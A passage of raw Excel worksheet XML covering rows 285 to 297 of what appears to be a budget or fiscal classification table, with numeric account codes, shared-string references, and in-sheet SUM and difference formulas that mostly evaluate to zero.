      <c r="Y285" s="17"/>
      <c r="Z285" s="17"/>
      <c r="AA285" s="17"/>
      <c r="AB285" s="17"/>
      <c r="AC285" s="17"/>
      <c r="AD285" s="17"/>
      <c r="AE285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AF285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AG285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AH285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AI285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AJ285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AK285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AL285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AM285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AN285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AO285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AP285" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="18" customHeight="1" spans="1:42">
      <c r="A286" s="10" t="s">
        <v>2968</v>
      </c>
      <c r="B286" s="16" t="s">
        <v>2969</v>
      </c>
      <c r="C286" s="17">
        <v>0</v>
      </c>
      <c r="D286" s="13">
        <v>2030604</v>
      </c>
      <c r="E286" s="16" t="s">
        <v>2970</v>
      </c>
      <c r="F286" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G286" s="17"/>
      <c r="H286" s="17"/>
      <c r="I286" s="17"/>
      <c r="J286" s="17"/>
      <c r="K286" s="17"/>
      <c r="L286" s="17"/>
      <c r="M286" s="17"/>
      <c r="N286" s="17"/>
      <c r="O286" s="17"/>
      <c r="P286" s="17"/>
      <c r="Q286" s="17"/>
      <c r="R286" s="17"/>
      <c r="S286" s="17"/>
      <c r="T286" s="17"/>
      <c r="U286" s="17"/>
      <c r="V286" s="17"/>
      <c r="W286" s="17"/>
      <c r="X286" s="17"/>
      <c r="Y286" s="17"/>
      <c r="Z286" s="17"/>
      <c r="AA286" s="17"/>
      <c r="AB286" s="17"/>
      <c r="AC286" s="17"/>
      <c r="AD286" s="17"/>
      <c r="AE286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AF286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AG286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AH286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AI286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AJ286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AK286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AL286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AM286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AN286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AO286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AP286" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
    </row>
    <row r="287" ht="18" customHeight="1" spans="1:42">
      <c r="A287" s="10" t="s">
        <v>2971</v>
      </c>
      <c r="B287" s="16" t="s">
        <v>2972</v>
      </c>
      <c r="C287" s="12">
        <f>SUM(C288:C289)</f>
        <v>0</v>
      </c>
      <c r="D287" s="13">
        <v>2030605</v>
      </c>
      <c r="E287" s="16" t="s">
        <v>2973</v>
      </c>
      <c r="F287" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G287" s="17"/>
      <c r="H287" s="17"/>
      <c r="I287" s="17"/>
      <c r="J287" s="17"/>
      <c r="K287" s="17"/>
      <c r="L287" s="17"/>
      <c r="M287" s="17"/>
      <c r="N287" s="17"/>
      <c r="O287" s="17"/>
      <c r="P287" s="17"/>
      <c r="Q287" s="17"/>
      <c r="R287" s="17"/>
      <c r="S287" s="17"/>
      <c r="T287" s="17"/>
      <c r="U287" s="17"/>
      <c r="V287" s="17"/>
      <c r="W287" s="17"/>
      <c r="X287" s="17"/>
      <c r="Y287" s="17"/>
      <c r="Z287" s="17"/>
      <c r="AA287" s="17"/>
      <c r="AB287" s="17"/>
      <c r="AC287" s="17"/>
      <c r="AD287" s="17"/>
      <c r="AE287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AF287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AG287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AH287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AI287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AJ287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AK287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AL287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AM287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AN287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AO287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AP287" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
    </row>
    <row r="288" ht="18" customHeight="1" spans="1:42">
      <c r="A288" s="10" t="s">
        <v>2974</v>
      </c>
      <c r="B288" s="16" t="s">
        <v>2975</v>
      </c>
      <c r="C288" s="17">
        <v>0</v>
      </c>
      <c r="D288" s="13">
        <v>2030606</v>
      </c>
      <c r="E288" s="16" t="s">
        <v>2976</v>
      </c>
      <c r="F288" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G288" s="17"/>
      <c r="H288" s="17"/>
      <c r="I288" s="17"/>
      <c r="J288" s="17"/>
      <c r="K288" s="17"/>
      <c r="L288" s="17"/>
      <c r="M288" s="17"/>
      <c r="N288" s="17"/>
      <c r="O288" s="17"/>
      <c r="P288" s="17"/>
      <c r="Q288" s="17"/>
      <c r="R288" s="17"/>
      <c r="S288" s="17"/>
      <c r="T288" s="17"/>
      <c r="U288" s="17"/>
      <c r="V288" s="17"/>
      <c r="W288" s="17"/>
      <c r="X288" s="17"/>
      <c r="Y288" s="17"/>
      <c r="Z288" s="17"/>
      <c r="AA288" s="17"/>
      <c r="AB288" s="17"/>
      <c r="AC288" s="17"/>
      <c r="AD288" s="17"/>
      <c r="AE288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AF288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AG288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AH288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AI288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AJ288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AK288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AL288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AM288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AN288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AO288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AP288" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
    </row>
    <row r="289" ht="18" customHeight="1" spans="1:42">
      <c r="A289" s="10" t="s">
        <v>2977</v>
      </c>
      <c r="B289" s="16" t="s">
        <v>2978</v>
      </c>
      <c r="C289" s="17">
        <v>0</v>
      </c>
      <c r="D289" s="13">
        <v>2030607</v>
      </c>
      <c r="E289" s="16" t="s">
        <v>2979</v>
      </c>
      <c r="F289" s="14">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="G289" s="17"/>
      <c r="H289" s="17"/>
      <c r="I289" s="17"/>
      <c r="J289" s="17"/>
      <c r="K289" s="17"/>
      <c r="L289" s="17">
        <v>1</v>
      </c>
      <c r="M289" s="17"/>
      <c r="N289" s="17"/>
      <c r="O289" s="17"/>
      <c r="P289" s="17"/>
      <c r="Q289" s="17"/>
      <c r="R289" s="17"/>
      <c r="S289" s="17"/>
      <c r="T289" s="17"/>
      <c r="U289" s="17"/>
      <c r="V289" s="17"/>
      <c r="W289" s="17"/>
      <c r="X289" s="17">
        <v>1</v>
      </c>
      <c r="Y289" s="17"/>
      <c r="Z289" s="17"/>
      <c r="AA289" s="17"/>
      <c r="AB289" s="17"/>
      <c r="AC289" s="17"/>
      <c r="AD289" s="17"/>
      <c r="AE289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AF289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AG289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AH289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AI289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AJ289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AK289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AL289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AM289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AN289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AO289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AP289" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
    </row>
    <row r="290" ht="18" customHeight="1" spans="1:42">
      <c r="A290" s="10" t="s">
        <v>2980</v>
      </c>
      <c r="B290" s="16" t="s">
        <v>2981</v>
      </c>
      <c r="C290" s="17">
        <v>0</v>
      </c>
      <c r="D290" s="13">
        <v>2030608</v>
      </c>
      <c r="E290" s="16" t="s">
        <v>2982</v>
      </c>
      <c r="F290" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G290" s="17"/>
      <c r="H290" s="17"/>
      <c r="I290" s="17"/>
      <c r="J290" s="17"/>
      <c r="K290" s="17"/>
      <c r="L290" s="17"/>
      <c r="M290" s="17"/>
      <c r="N290" s="17"/>
      <c r="O290" s="17"/>
      <c r="P290" s="17"/>
      <c r="Q290" s="17"/>
      <c r="R290" s="17"/>
      <c r="S290" s="17"/>
      <c r="T290" s="17"/>
      <c r="U290" s="17"/>
      <c r="V290" s="17"/>
      <c r="W290" s="17"/>
      <c r="X290" s="17"/>
      <c r="Y290" s="17"/>
      <c r="Z290" s="17"/>
      <c r="AA290" s="17"/>
      <c r="AB290" s="17"/>
      <c r="AC290" s="17"/>
      <c r="AD290" s="17"/>
      <c r="AE290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AF290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AG290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AH290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AI290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AJ290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AK290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AL290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AM290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AN290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AO290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AP290" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
    </row>
    <row r="291" ht="18" customHeight="1" spans="1:42">
      <c r="A291" s="10">
        <v>1030721</v>
      </c>
      <c r="B291" s="16" t="s">
        <v>2983</v>
      </c>
      <c r="C291" s="12">
        <f>SUM(C292:C294)</f>
        <v>0</v>
      </c>
      <c r="D291" s="13">
        <v>2030699</v>
      </c>
      <c r="E291" s="16" t="s">
        <v>2984</v>
      </c>
      <c r="F291" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G291" s="17"/>
      <c r="H291" s="17"/>
      <c r="I291" s="17"/>
      <c r="J291" s="17"/>
      <c r="K291" s="17"/>
      <c r="L291" s="17"/>
      <c r="M291" s="17"/>
      <c r="N291" s="17"/>
      <c r="O291" s="17"/>
      <c r="P291" s="17"/>
      <c r="Q291" s="17"/>
      <c r="R291" s="17"/>
      <c r="S291" s="17"/>
      <c r="T291" s="17"/>
      <c r="U291" s="17"/>
      <c r="V291" s="17"/>
      <c r="W291" s="17"/>
      <c r="X291" s="17"/>
      <c r="Y291" s="17"/>
      <c r="Z291" s="17"/>
      <c r="AA291" s="17"/>
      <c r="AB291" s="17"/>
      <c r="AC291" s="17"/>
      <c r="AD291" s="17"/>
      <c r="AE291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AF291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AG291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AH291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AI291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AJ291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AK291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AL291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AM291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AN291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AO291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="AP291" s="17">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
    </row>
    <row r="292" ht="18" customHeight="1" spans="1:42">
      <c r="A292" s="10">
        <v>103072101</v>
      </c>
      <c r="B292" s="16" t="s">
        <v>2985</v>
      </c>
      <c r="C292" s="17">
        <v>0</v>
      </c>
      <c r="D292" s="13">
        <v>20399</v>
      </c>
      <c r="E292" s="11" t="s">
        <v>2986</v>
      </c>
      <c r="F292" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G292" s="12">
        <f t="shared" ref="G292:R292" si="131">G293</f>
        <v>0</v>
      </c>
      <c r="H292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="I292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="J292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="K292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="L292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="M292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="N292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="O292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="P292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="Q292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="R292" s="12">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="S292" s="12">
        <v>0</v>
      </c>
      <c r="T292" s="12">
        <v>0</v>
      </c>
      <c r="U292" s="12">
        <v>0</v>
      </c>
      <c r="V292" s="12">
        <v>0</v>
      </c>
      <c r="W292" s="12">
        <v>0</v>
      </c>
      <c r="X292" s="12">
        <v>0</v>
      </c>
      <c r="Y292" s="12">
        <v>0</v>
      </c>
      <c r="Z292" s="12">
        <v>0</v>
      </c>
      <c r="AA292" s="12">
        <v>0</v>
      </c>
      <c r="AB292" s="12">
        <v>0</v>
      </c>
      <c r="AC292" s="12">
        <v>0</v>
      </c>
      <c r="AD292" s="12">
        <v>0</v>
      </c>
      <c r="AE292" s="12">
        <f t="shared" ref="AE292:AP292" si="132">AE293</f>
        <v>0</v>
      </c>
      <c r="AF292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AG292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AH292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AI292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AJ292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AK292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AL292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AM292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AN292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AO292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="AP292" s="12">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
    </row>
    <row r="293" ht="18" customHeight="1" spans="1:42">
      <c r="A293" s="10">
        <v>103072102</v>
      </c>
      <c r="B293" s="16" t="s">
        <v>2987</v>
      </c>
      <c r="C293" s="17">
        <v>0</v>
      </c>
      <c r="D293" s="13">
        <v>2039999</v>
      </c>
      <c r="E293" s="16" t="s">
        <v>2988</v>
      </c>
      <c r="F293" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G293" s="17"/>
      <c r="H293" s="17"/>
      <c r="I293" s="17"/>
      <c r="J293" s="17"/>
      <c r="K293" s="17"/>
      <c r="L293" s="17"/>
      <c r="M293" s="17"/>
      <c r="N293" s="17"/>
      <c r="O293" s="17"/>
      <c r="P293" s="17"/>
      <c r="Q293" s="17"/>
      <c r="R293" s="17"/>
      <c r="S293" s="17"/>
      <c r="T293" s="17"/>
      <c r="U293" s="17"/>
      <c r="V293" s="17"/>
      <c r="W293" s="17"/>
      <c r="X293" s="17"/>
      <c r="Y293" s="17"/>
      <c r="Z293" s="17"/>
      <c r="AA293" s="17"/>
      <c r="AB293" s="17"/>
      <c r="AC293" s="17"/>
      <c r="AD293" s="17"/>
      <c r="AE293" s="17">
        <f>G293-S293</f>
        <v>0</v>
      </c>
      <c r="AF293" s="17">
        <f t="shared" ref="AF293:AP293" si="133">H293-T293</f>
        <v>0</v>
      </c>
      <c r="AG293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="AH293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="AI293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="AJ293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="AK293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="AL293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="AM293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="AN293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="AO293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="AP293" s="17">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
    </row>
    <row r="294" ht="18" customHeight="1" spans="1:42">
      <c r="A294" s="10">
        <v>103072199</v>
      </c>
      <c r="B294" s="16" t="s">
        <v>2989</v>
      </c>
      <c r="C294" s="17">
        <v>0</v>
      </c>
      <c r="D294" s="13">
        <v>204</v>
      </c>
      <c r="E294" s="11" t="s">
        <v>2990</v>
      </c>
      <c r="F294" s="14">
        <f t="shared" si="107"/>
        <v>422</v>
      </c>
      <c r="G294" s="12">
        <f t="shared" ref="G294:R294" si="134">G295+G298+G309+G316+G324+G333+G347+G357+G367+G375+G381</f>
        <v>489</v>
      </c>
      <c r="H294" s="12">
        <f t="shared" si="134"/>
        <v>173</v>
      </c>
      <c r="I294" s="12">
        <f t="shared" si="134"/>
        <v>0</v>
      </c>
      <c r="J294" s="12">
        <f t="shared" si="134"/>
        <v>47</v>
      </c>
      <c r="K294" s="12">
        <f t="shared" si="134"/>
        <v>98</v>
      </c>
      <c r="L294" s="12">
        <f t="shared" si="134"/>
        <v>113</v>
      </c>
      <c r="M294" s="12">
        <f t="shared" si="134"/>
        <v>102</v>
      </c>
      <c r="N294" s="12">
        <f t="shared" si="134"/>
        <v>13</v>
      </c>
      <c r="O294" s="12">
        <f t="shared" si="134"/>
        <v>0</v>
      </c>
      <c r="P294" s="12">
        <f t="shared" si="134"/>
        <v>0</v>
      </c>
      <c r="Q294" s="12">
        <f t="shared" si="134"/>
        <v>0</v>
      </c>
      <c r="R294" s="12">
        <f t="shared" si="134"/>
        <v>49</v>
      </c>
      <c r="S294" s="12">
        <v>453</v>
      </c>
      <c r="T294" s="12">
        <v>137</v>
      </c>
      <c r="U294" s="12">
        <v>0</v>
      </c>
      <c r="V294" s="12">
        <v>42</v>
      </c>
      <c r="W294" s="12">
        <v>91</v>
      </c>
      <c r="X294" s="12">
        <v>103</v>
      </c>
      <c r="Y294" s="12">
        <v>91</v>
      </c>
      <c r="Z294" s="12">
        <v>9</v>
      </c>
      <c r="AA294" s="12">
        <v>0</v>
      </c>
      <c r="AB294" s="12">
        <v>0</v>
      </c>
      <c r="AC294" s="12">
        <v>0</v>
      </c>
      <c r="AD294" s="12">
        <v>45</v>
      </c>
      <c r="AE294" s="12">
        <f t="shared" ref="AE294:AP294" si="135">AE295+AE298+AE309+AE316+AE324+AE333+AE347+AE357+AE367+AE375+AE381</f>
        <v>36</v>
      </c>
      <c r="AF294" s="12">
        <f t="shared" si="135"/>
        <v>36</v>
      </c>
      <c r="AG294" s="12">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="AH294" s="12">
        <f t="shared" si="135"/>
        <v>5</v>
      </c>
      <c r="AI294" s="12">
        <f t="shared" si="135"/>
        <v>7</v>
      </c>
      <c r="AJ294" s="12">
        <f t="shared" si="135"/>
        <v>10</v>
      </c>
      <c r="AK294" s="12">
        <f t="shared" si="135"/>
        <v>11</v>
      </c>
      <c r="AL294" s="12">
        <f t="shared" si="135"/>
        <v>4</v>
      </c>
      <c r="AM294" s="12">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="AN294" s="12">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="AO294" s="12">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="AP294" s="12">
        <f t="shared" si="135"/>
        <v>4</v>
      </c>
    </row>
    <row r="295" ht="18" customHeight="1" spans="1:42">
      <c r="A295" s="10">
        <v>1030799</v>
      </c>
      <c r="B295" s="16" t="s">
        <v>2991</v>
      </c>
      <c r="C295" s="17">
        <v>0</v>
      </c>
      <c r="D295" s="13">
        <v>20401</v>
      </c>
      <c r="E295" s="11" t="s">
        <v>2992</v>
      </c>
      <c r="F295" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G295" s="12">
        <f t="shared" ref="G295:R295" si="136">SUM(G296:G297)</f>
        <v>0</v>
      </c>
      <c r="H295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="I295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="J295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="K295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="L295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="M295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="N295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="O295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="P295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="Q295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="R295" s="12">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="S295" s="12">
        <v>0</v>
      </c>
      <c r="T295" s="12">
        <v>0</v>
      </c>
      <c r="U295" s="12">
        <v>0</v>
      </c>
      <c r="V295" s="12">
        <v>0</v>
      </c>
      <c r="W295" s="12">
        <v>0</v>
      </c>
      <c r="X295" s="12">
        <v>0</v>
      </c>
      <c r="Y295" s="12">
        <v>0</v>
      </c>
      <c r="Z295" s="12">
        <v>0</v>
      </c>
      <c r="AA295" s="12">
        <v>0</v>
      </c>
      <c r="AB295" s="12">
        <v>0</v>
      </c>
      <c r="AC295" s="12">
        <v>0</v>
      </c>
      <c r="AD295" s="12">
        <v>0</v>
      </c>
      <c r="AE295" s="12">
        <f t="shared" ref="AE295:AP295" si="137">SUM(AE296:AE297)</f>
        <v>0</v>
      </c>
      <c r="AF295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AG295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AH295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AI295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AJ295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AK295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AL295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AM295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AN295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AO295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="AP295" s="12">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
    </row>
    <row r="296" ht="18" customHeight="1" spans="1:42">
      <c r="A296" s="10">
        <v>10308</v>
      </c>
      <c r="B296" s="11" t="s">
        <v>2993</v>
      </c>
      <c r="C296" s="12">
        <f>SUM(C297:C298)</f>
        <v>0</v>
      </c>
      <c r="D296" s="13">
        <v>2040101</v>
      </c>
      <c r="E296" s="16" t="s">
        <v>2994</v>
      </c>
      <c r="F296" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G296" s="17"/>
      <c r="H296" s="17"/>
      <c r="I296" s="17"/>
      <c r="J296" s="17"/>
      <c r="K296" s="17"/>
      <c r="L296" s="17"/>
      <c r="M296" s="17"/>
      <c r="N296" s="17"/>
      <c r="O296" s="17"/>
      <c r="P296" s="17"/>
      <c r="Q296" s="17"/>
      <c r="R296" s="17"/>
      <c r="S296" s="17"/>
      <c r="T296" s="17"/>
      <c r="U296" s="17"/>
      <c r="V296" s="17"/>
      <c r="W296" s="17"/>
      <c r="X296" s="17"/>
      <c r="Y296" s="17"/>
      <c r="Z296" s="17"/>
      <c r="AA296" s="17"/>
      <c r="AB296" s="17"/>
      <c r="AC296" s="17"/>
      <c r="AD296" s="17"/>
      <c r="AE296" s="17">
        <f t="shared" ref="AE296:AP297" si="138">G296-S296</f>
        <v>0</v>
      </c>
      <c r="AF296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AG296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AH296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AI296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AJ296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AK296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AL296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AM296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AN296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AO296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AP296" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
    </row>
    <row r="297" ht="18" customHeight="1" spans="1:42">
      <c r="A297" s="10">
        <v>1030801</v>
      </c>
      <c r="B297" s="16" t="s">
        <v>2995</v>
      </c>
      <c r="C297" s="17">
        <v>0</v>
      </c>
      <c r="D297" s="13">
        <v>2040199</v>
      </c>
      <c r="E297" s="16" t="s">
        <v>2996</v>
      </c>
      <c r="F297" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G297" s="17"/>
      <c r="H297" s="17"/>
      <c r="I297" s="17"/>
      <c r="J297" s="17"/>
      <c r="K297" s="17"/>
      <c r="L297" s="17"/>
      <c r="M297" s="17"/>
      <c r="N297" s="17"/>
      <c r="O297" s="17"/>
      <c r="P297" s="17"/>
      <c r="Q297" s="17"/>
      <c r="R297" s="17"/>
      <c r="S297" s="17"/>
      <c r="T297" s="17"/>
      <c r="U297" s="17"/>
      <c r="V297" s="17"/>
      <c r="W297" s="17"/>
      <c r="X297" s="17"/>
      <c r="Y297" s="17"/>
